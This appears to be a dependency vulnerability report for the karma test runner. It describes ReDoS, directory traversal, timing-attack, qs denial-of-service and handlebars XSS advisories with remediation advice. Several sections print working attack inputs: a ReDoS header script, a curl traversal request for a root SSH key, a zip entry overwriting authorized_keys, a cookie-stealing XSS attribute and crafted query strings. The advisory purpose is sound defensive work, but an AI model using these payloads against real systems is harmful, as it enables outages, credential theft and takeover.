Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's   Number of steps
ACCCX               3               38
ACCCCX              4               71
ACCCCCX             5               136
ACCCCCCCCCCCCCCX    14              65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see whether the string is valid. These extreme situations cause the regex engine to work very slowly (exponentially related to input size, as shown above). An attacker who can supply such input can therefore make the service consume CPU excessively, resulting in a Denial of Service.

Remediation

Upgrade useragent to version 2.1.13 or higher.

References

Regular Expression Denial of Service (ReDoS)

high severity
  • Vulnerable module: method-override
  • Introduced through: connect@2.26.6

Detailed paths

  • Introduced through: karma@0.13.0-rc.1 > connect@2.26.6 > method-override@2.2.0

Overview

method-override is a module to override HTTP verbs.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). It uses the regex / *, */ to split HTTP headers. An attacker may send specially crafted input in the X-HTTP-Method-Override header and cause a significant slowdown.
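
A minimal sketch of the attacker's side, assuming a hypothetical target at localhost:3000 that runs the methodOverride() middleware; a header value made of spaces with no comma is the worst case for the splitting regex:

const http = require('http');

// 50,000 spaces and no comma push the / *, */ split into heavy backtracking
const payload = ' '.repeat(50000);

http.request({
  host: 'localhost',
  port: 3000,
  method: 'POST',
  path: '/',
  headers: { 'X-HTTP-Method-Override': payload }
}, function (res) { res.resume(); }).end();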

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's   Number of steps
ACCCX               3               38
ACCCCX              4               71
ACCCCCX             5               136
ACCCCCCCCCCCCCCX    14              65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see whether the string is valid. These extreme situations cause the regex engine to work very slowly (exponentially related to input size, as shown above). An attacker who can supply such input can therefore make the service consume CPU excessively, resulting in a Denial of Service.

Remediation

Upgrade method-override to version 2.3.10 or higher.

References

Root Path Disclosure

medium severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.1 > connect@2.26.6 > serve-static@1.6.5 > send@0.9.3

Overview

Send is a library for streaming files from the file system as an http response. It supports partial responses (Ranges), conditional-GET negotiation, high test coverage, and granular events which may be leveraged to take appropriate actions in your application or framework.

Affected versions of this package are vulnerable to a Root Path Disclosure.

Remediation

Upgrade send to version 0.11.1 or higher. If a direct dependency update is not possible, use snyk wizard to patch this vulnerability.

References

Fixed in 0.13.0-rc.1

Regular Expression Denial of Service (DoS)

medium severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.0 > socket.io@0.9.16 > socket.io-client@0.9.16 > uglify-js@1.2.5

Overview

The parse() function in the uglify-js package prior to version 2.6.0 is vulnerable to regular expression denial of service (ReDoS) attacks when long inputs of certain patterns are processed.

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's   Number of steps
ACCCX               3               38
ACCCCX              4               71
ACCCCCX             5               136
ACCCCCCCCCCCCCCX    14              65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see whether the string is valid. These extreme situations cause the regex engine to work very slowly (exponentially related to input size, as shown above). An attacker who can supply such input can therefore make the service consume CPU excessively, resulting in a Denial of Service.

Remediation

Upgrade uglify-js to version 2.6.0 or greater. If a direct dependency update is not possible, use snyk wizard to patch this vulnerability.

References

Improper minification of non-boolean comparisons

high severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.0 > socket.io@0.9.16 > socket.io-client@0.9.16 > uglify-js@1.2.5

Overview

uglify-js is a JavaScript parser, minifier, compressor and beautifier toolkit.

Tom MacWright discovered that UglifyJS versions 2.4.23 and earlier are affected by a vulnerability which allows a specially crafted Javascript file to have altered functionality after minification. This bug was demonstrated by Yan to allow potentially malicious code to be hidden within secure code, activated by minification.

Details

In Boolean algebra, De Morgan's laws describe the relationships between conjunctions (&&), disjunctions (||) and negations (!). In JavaScript form, they state that:

 !(a && b) === (!a) || (!b)
 !(a || b) === (!a) && (!b)

The laws do not necessarily hold, however, when one of the values is not a boolean: the negated form always evaluates to a boolean, while the original expression may evaluate to an operand's raw value.

Vulnerable versions of UglifyJS do not account for this restriction, and erroneously apply the laws to a statement if it can be reduced in length by it.

Consider this authentication function:

function isTokenValid(user) {
    var timeLeft =
        !!config && // config object exists
        !!user.token && // user object has a token
        !user.token.invalidated && // token is not explicitly invalidated
        !config.uninitialized && // config is initialized
        !config.ignoreTimestamps && // don't ignore timestamps
        getTimeLeft(user.token.expiry); // > 0 if expiration is in the future

    // The token must not be expired
    return timeLeft > 0;
}

function getTimeLeft(expiry) {
  return expiry - getSystemTime();
}

When minified with a vulnerable version of UglifyJS, it will produce the following insecure output, where a token will never expire:

( Formatted for readability )

function isTokenValid(user) {
    var timeLeft = !(                       // negation
        !config                             // config object does not exist
        || !user.token                      // user object does not have a token
        || user.token.invalidated           // token is explicitly invalidated
        || config.uninitialized             // config isn't initialized
        || config.ignoreTimestamps          // ignore timestamps
        || !getTimeLeft(user.token.expiry)  // > 0 if expiration is in the future
    );
    return timeLeft > 0
}

function getTimeLeft(expiry) {
    return expiry - getSystemTime()
}

Remediation

Upgrade UglifyJS to version 2.4.24 or higher.

References

Fixed in 0.12.25

Non-Constant Time String Comparison

medium severity
  • Vulnerable module: cookie-signature
  • Introduced through: connect@2.12.0

Detailed paths

  • Introduced through: karma@0.12.24-dev-test > connect@2.12.0 > cookie-signature@1.0.1

Overview

'cookie-signature' is a library for signing cookies.

Versions before 1.0.4 of the library use the built-in string comparison mechanism, ===, and not a constant-time string comparison. As a result, the comparison will fail faster when the first characters in the token are incorrect. An attacker can use this difference to perform a timing attack, essentially allowing them to guess the secret one character at a time.

You can read more about timing attacks in Node.js on the Snyk blog: https://snyk.io/blog/node-js-timing-attack-ccc-ctf/
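
A minimal sketch of the general mitigation (not the library's actual patch): compare the signatures in constant time instead of with ===, for example with crypto.timingSafeEqual, available since Node.js 6.6:

const crypto = require('crypto');

// '===' short-circuits on the first mismatching character, leaking timing information
function unsafeCompare(expected, provided) {
  return expected === provided;
}

// constant-time comparison: every byte is inspected regardless of where a mismatch occurs
function safeCompare(expected, provided) {
  const a = Buffer.from(String(expected));
  const b = Buffer.from(String(provided));
  if (a.length !== b.length) return false;
  return crypto.timingSafeEqual(a, b);
}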

Remediation

Upgrade to 1.0.4 or greater.

References

Directory Traversal

medium severity

Detailed paths

  • Introduced through: karma@0.12.24-dev-test > connect@2.12.0 > send@0.1.4

Overview

send is a library for streaming files from the file system.

Affected versions of this package are vulnerable to Directory Traversal attacks due to an insecure path comparison. When relying on the root option to restrict file access, a malicious user may escape the restricted directory and access files in a similarly named directory. For example, the path /my-secret is considered to be inside the root /my.
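
A minimal sketch of the insecure comparison described above (not send's exact code): a plain prefix check accepts /my-secret as being inside the root /my, while comparing against the root plus a trailing separator rejects it:

const path = require('path');

const root = '/my';
const requested = path.resolve('/my-secret/passwords.txt');   // hypothetical requested file

// naive prefix check: passes, because '/my-secret/...' starts with '/my'
console.log(requested.indexOf(root) === 0);                    // true

// safer check: require the separator after the root
console.log(requested.indexOf(root + path.sep) === 0);         // false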

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with “dot-dot-slash (../)” sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade to a version greater than or equal to 0.8.4.

References

Denial of Service (Event Loop Blocking)

medium severity

Detailed paths

  • Introduced through: karma@0.12.24-dev-test > connect@2.12.0 > qs@0.6.6

Overview

qs is a querystring parser that supports nesting and arrays, with a depth limit.

Affected versions of this package are vulnerable to Denial of Service (DoS). When parsing a string representing a deeply nested object, qs will block the event loop for long periods of time. Such a delay may hold up the server's resources, keeping it from processing other requests in the meantime, thus enabling a Denial-of-Service attack.
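
A minimal sketch of the shape of such an input, assuming a vulnerable 0.x install; the depth needed to cause a noticeable stall depends on the version and environment:

const qs = require('qs');    // assuming a vulnerable 0.6.x install

// a deeply nested key: a[p][p][p]...[p]=x
const crafted = 'a' + '[p]'.repeat(10000) + '=x';

console.time('parse');
qs.parse(crafted);           // parsing runs synchronously on the event loop
console.timeEnd('parse');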

Remediation

Update qs to version 1.0.0 or higher. In these versions, qs enforces a max object depth (along with other limits), limiting the event loop length and thus preventing such an attack.

References

Denial of Service (Memory Exhaustion)

high severity

Detailed paths

  • Introduced through: karma@0.12.24-dev-test > connect@2.12.0 > qs@0.6.6

Overview

qs is a querystring parser that supports nesting and arrays, with a depth limit.

Affected versions of this package are vulnerable to Denial of Service (DoS) attacks. During parsing, the qs module may create a sparse array (an array where not all elements are filled) and grow it to the necessary size based on the indices used. An attacker can specify a high index value in a query string, making the server allocate a correspondingly large array. Truly large values can cause the server to run out of memory and crash, thus enabling a Denial of Service attack.
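
A minimal sketch of the payload shape, assuming a vulnerable 0.x install (later versions cap the array index and treat larger values as plain object keys):

const qs = require('qs');    // assuming a vulnerable 0.6.x install

// a single huge index makes vulnerable versions allocate a correspondingly large sparse array
qs.parse('items[100000000]=1');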

Remediation

Upgrade qs to version 1.0.0 or greater. In these versions, qs introduced a low limit on the index value, preventing such an attack.

References

Fixed in 0.9.0

Cross-site Scripting (XSS)

medium severity

Detailed paths

  • Introduced through: karma@0.8.8 > istanbul@0.1.46 > handlebars@1.0.12

Overview

handlebars provides the power necessary to let you build semantic templates.

When using attributes without quotes in a handlebars template, an attacker can manipulate the input to introduce additional attributes, potentially executing code. This may lead to a Cross-site Scripting (XSS) vulnerability, assuming an attacker can influence the value entered into the template. If the handlebars template is used to render user-generated content, this vulnerability may escalate to a persistent XSS vulnerability.

Details

Cross-Site Scripting (XSS) attacks occur when an attacker tricks a user’s browser to execute malicious JavaScript code in the context of a victim’s domain. Such scripts can steal the user’s session cookies for the domain, scrape or modify its content, and perform or modify actions on the user’s behalf, actions typically blocked by the browser’s Same Origin Policy.

These attacks are possible by escaping the context of the web application and injecting malicious scripts in an otherwise trusted website. These scripts can introduce additional attributes (say, a "new" option in a dropdown list or a new link to a malicious site) and can potentially execute code on the client side, unbeknownst to the victim. This occurs when characters like < > " ' are not escaped properly.

There are a few types of XSS:

  • Persistent XSS is an attack in which the malicious code persists into the web app’s database.
  • Reflected XSS is an attack in which the website echoes back a portion of the request. The attacker needs to trick the user into clicking a malicious link (for instance through a phishing email or malicious JS on another page), which triggers the XSS attack.
  • DOM-based XSS is an attack that occurs purely in the browser when client-side JavaScript echoes back a portion of the URL onto the page. DOM-based XSS is notoriously hard to detect, as the server never gets a chance to see the attack taking place.

Example:

Assume handlebars was used to display user comments and avatars, using the following template:

<img src={{avatarUrl}}><pre>{{comment}}</pre>

If an attacker spoofed their avatar URL and provided the following value:

http://evil.org/avatar.png onload=alert(document.cookie)

The resulting HTML would be the following, triggering the script once the image loads:

<img src=http://evil.org/avatar.png onload=alert(document.cookie)><pre>Gotcha!</pre>
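
A minimal runnable sketch of the same scenario, assuming a vulnerable 1.x install (later handlebars releases additionally escape characters such as = and the backtick, which neutralises this particular payload):

const Handlebars = require('handlebars');   // assuming a vulnerable 1.x install

// unquoted attribute in the template, exactly as in the example above
const template = Handlebars.compile('<img src={{avatarUrl}}><pre>{{comment}}</pre>');

const html = template({
  avatarUrl: 'http://evil.org/avatar.png onload=alert(document.cookie)',
  comment: 'Gotcha!'
});

console.log(html);
// <img src=http://evil.org/avatar.png onload=alert(document.cookie)><pre>Gotcha!</pre>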

References